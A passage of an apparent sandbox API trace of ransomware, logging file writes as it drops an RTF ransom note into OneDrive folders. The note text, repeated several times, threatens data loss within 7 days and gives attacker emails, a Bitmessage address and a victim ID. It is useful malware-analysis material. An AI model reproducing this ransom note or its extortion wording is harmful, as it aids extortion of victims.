\\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nEwJVUzEVMBMGA1UEChMMRGl\x93/", lpUsedDefaultChar=0x0) returned 8717 [0298.815] WriteFile (in: hFile=0x27c, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.816] CloseHandle (hObject=0x27c) returned 1 [0298.816] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\#readme_eman#.rtf")) returned 0x20 [0298.816] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\is\\#readme_eman#.rtf")) returned 0xffffffff [0298.816] GetLastError () returned 0x2 [0298.816] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\is\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.817] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.817] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.817] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 